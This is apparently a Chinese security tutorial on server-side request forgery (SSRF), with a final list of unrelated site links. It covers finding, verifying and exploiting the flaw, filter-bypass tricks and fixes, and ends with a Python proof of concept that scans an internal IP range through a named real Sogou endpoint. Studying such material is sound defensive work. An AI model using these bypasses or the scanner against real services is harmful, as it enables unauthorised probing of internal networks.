4_SSRF
SSRF
SSRF(服务请求伪造)是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,它将一个可以发起网络请求
的服务当作跳板来攻击其他服务器,SSRF的攻击目标一般是内网。
当服务器提供了从其他服务器获取数据的功能(如:从指定URL地址获取网页文本内容、加载指定地址的图片,下
载等),但是没有对目标地址做过滤与限制时就会出现SSRF。
SSRF的危害
可以扫描内部网络
可以构造数据攻击内部主机
漏洞挖掘
其实只要能对外发起网络请求就有可能存在SSRF漏洞
1.从WEB功能上寻找
通过URL分享内容
文本处理、编码处理、转码等服务
在线翻译
通过URL地址加载与下载图片
图片、文章的收藏
设置邮件接收服务器
2.从URL关键字寻找
share、wap、url、link、src、source、target、u、3g、display、sourceURL、domain...
3.burpsuite插件自动化检测ssrf漏洞
漏洞验证
http://www.douban.com/***/service?image=http://www.baidu.com/img/bd_logo1.png
1.右键在新窗口中打开图片,若浏览器上URL地址为http://www.baidu.com/img/bd_logo1.png
说明不存在SSRF漏洞。
2.firebug看网络连接信息,若没有http://www.baidu.com/img/bd_logo1.png这个图片请求。
则证明图片是豆瓣服务器端发起的请求,则可能存在SSRF漏洞。
找存在HTTP服务的内网地址:
1.从漏洞平台中的历史漏洞寻找泄露的存在web应用内网地址。
2.通过二级域名暴力猜测工具模糊猜测内网地址。
漏洞利用放式
1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。
2.攻击运行在内网或本地的应用程序(比如溢出)。
3.对内网web应用进行指纹识别,通过访问默认文件实现。
4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struct2,sqli等)
5.利用file协议读取本地文件等。
绕过过滤
有时漏洞利用时会遇到IP限制,可用如下方法绕过:
*使用@:http://A.com@10.10.10.10 = 10.10.10.10
*IP地址转换成十进制、八进制:127.0.0.1 = 2130706433
*使用短地址:http://10.10.116.11 = http://t.cn/RwbLKDx
*端口绕过:IP后面加一个端口
*xip.io:10.0.0.1.xip.io = 10.0.0.1
www.10.0.0.1.xip.io = 10.0.0.1
mysite.10.0.0.1.xip.io = 10.0.0.1
foo.bar.10.0.0.1.xip.io = 10.0.0.1
*通过js跳转
通用的SSRF实例
*weblogin配置不当,天生ssrf漏洞
*discuz x2.5/x3.0/x3.1/x3.2 ssrf漏洞
*CVE-2016-1897/8 - FFMpeg
*CVE-2016-3718 - ImageMagick
修复方案
1.过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。
如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准
2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
3.限制请求的端口为http常用的端口,比如,80,443,8080,8090
4.黑名单内网IP,避免应用被用来获取内网数据,攻击内网。
5.禁用不需要的协议,仅仅允许http和https请求。
附POC
#!/usr/bin/env python
# -*- coding: utf-8 -*- import re
import requests
from IPy import IP
import Queue
import threading def get_url_queue():
url = "http://www.sogou.com/reventondc/external?key=&objid=&type=2&charset=utf-8&url=http://"
urllist = Queue.Queue()
ip_list = IP('10.146.20.0/24')
port_list = ['80','8000','8080']
for ip_add in ip_list:
ip_add = str(ip_add)
for port in port_list:
url_t = url + ip_add + ':' + port
urllist.put(url_t)
return urllist def get_title(urllist):
while not urllist.empty():
url = urllist.get()
html = requests.get(url).text
patt = r'<title>(.*?)</title>'
m = re.search(patt,html)
if m:
title = m.group(1)
print "%s\t%s" % (url,title) urllist = get_url_queue()
print "start get title..."
for x in xrange(1,30):
t = threading.Thread(target=get_title,args=(urllist,))
t.start()
4_SSRF的更多相关文章
随机推荐
- Scala关于软件的安装
1.安装JDK 因为很多系统都会预装java,所以我们首先要测试Java版本.这里我们要求要在1.8以上.在终端输入java -version来测试版本 Windows 关于Windows,我们首先要 ...
- poj_3122:Pie(二分)
不算难的一道二分..各种玄学错误..eps小了T,大了WA..最后G++改成C++提交就AC了.. #include<iostream> #include<cstdio> #i ...
- poj_3468: A Simple Problem with Integers (树状数组区间更新)
题目是对一个数组,支持两种操作 操作C:对下标从a到b的每个元素,值增加c: 操作Q:对求下标从a到b的元素值之和. 这道题也可以用线段树解,本文不做描述,下面分析如何用树状数组来解决这道题. 先把问 ...
- ES6函数扩展
前面的话 函数是所有编程语言的重要组成部分,在ES6出现前,JS的函数语法一直没有太大的变化,从而遗留了很多问题和的做法,导致实现一些基本的功能经常要编写很多代码.ES6大力度地更新了函数特性,在ES ...
- php apache phpmyadmin mysql环境安装
文件下载: Apache: http://httpd.apache.org/download.cgi PHP,phpMyAdmin,mysql,API下载:http://pan.baidu.com/s ...
- iOS与web交互的那些事
一转眼又是大半年过去了,除了上架了一款新应用外,也没什么进步.所以最近琢磨着搞点事情,不然我那本Java教程都快看完了. 做为一名iOS高(la)阶(ji)法师,几乎所有的任务里,都会出现web这个从 ...
- 枪战Maf[POI2008]
题目描述 有n个人,每个人手里有一把手枪.一开始所有人都选定一个人瞄准(有可能瞄准自己).然后他们按某个顺序开枪,且任意时刻只有一个人开枪.因此,对于不同的开枪顺序,最后死的人也不同. 输入 输入n人 ...
- 福利 c++ 标准头文件大全
#include<cmath> #include<math.h> #include<ctype.h> #include<algorithm> #incl ...
- 安徽省2016“京胜杯”程序设计大赛_G_木条染色
木条染色 Time Limit: 1000 MS Memory Limit: 65536 KB Total Submissions: 134 Accepted: 20 Description 小 ...
- HTML+CSS+JS简介
1.HTML与 CSS 1 1.1 HTML 1 1.2 HTML5 2 1.2.1 HTML5的特性 3 1.3 CSS 4 2.JavaScript 6 2.1特性 7 2.2编程 8 3.Sp ...